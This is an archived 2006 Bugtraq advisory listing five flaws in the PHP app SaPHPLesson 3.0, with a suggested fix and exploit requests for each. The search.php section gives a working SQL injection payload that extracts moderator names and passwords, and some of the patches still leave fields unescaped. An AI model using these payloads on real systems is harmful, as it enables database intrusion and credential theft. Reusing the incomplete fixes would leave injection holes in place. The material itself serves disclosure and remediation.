SaPHPLesson 3.0 Multbugs

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SaPHPLesson 3.0 Multbugs
From: o.y.6@xxxxxxxxxxx
Date: 4 May 2006 21:09:41 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

        1- Unfilter array

        Filename        :- show.php
        Line            :- 102

[code]
$hrow[] = $Row2;[/code]

Fix :-

Add To Line [ 11 ] /show.php This Code :-

        we add the code to global to fix all unfilter ver. at the code :)

[code]
$hrow = array();[/code]

Exploit :-

        GET ^
                /lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

        2- Unfilter array

        Filename        :- showcat.php
        Line            :- 80

[code]
$Lsnrow[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /showcat.php This Code :-

        we add the code to global to fix all unfilter ver. at the code :)

[code]
$Lsnrow = array();[/code]

Exploit :-

        GET ^

        /lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

        3- SQL Injection

        Filename        :- search.php
        Line            :- MultLines

Fix :-

        Line 28 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY 
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by 
".addslashes($Order)." ".addslashes($Trteb)."";[/code]

        Line 32 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find 
REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and 
forums.id=less.forumno order by ".addslashes($Order)." 
".addslashes($Trteb)."";[/code]

        Exploit :-

        POST ^

        Word=a&Find=lesstitle UNION ALL SELECT 
null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null
 FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

/---------------------------------------------------------/

        4- SQL Injection

        Filename        :- misc.php
        Line            :- 64

Fix :-
        Replace Line 62 & 63 With This Code

[code]
$LID  = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

        5- Unfilter array

        Filename        :- index.php
        Line            :- 24

[code]
$rows[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /index.php This Code :-

        we add the code to global to fix all unfilter ver. at the code :)

[code]
$rows = array();
$hrow = array();[/code]

Exploit :-

        GET ^

        /saphplesson/index.php?rows=D3vil-x01

Prev by Date: Invision Community Blog .. Bugs
Next by Date: Re: WebCalendar User Account Enumeration Weakness
Previous by thread: Re: Invision Community Blog .. Bugs
Next by thread: Cryptomathic ActiveX Buffer Overflow (TDC Digital signature)
Index(es):
- Date
- Thread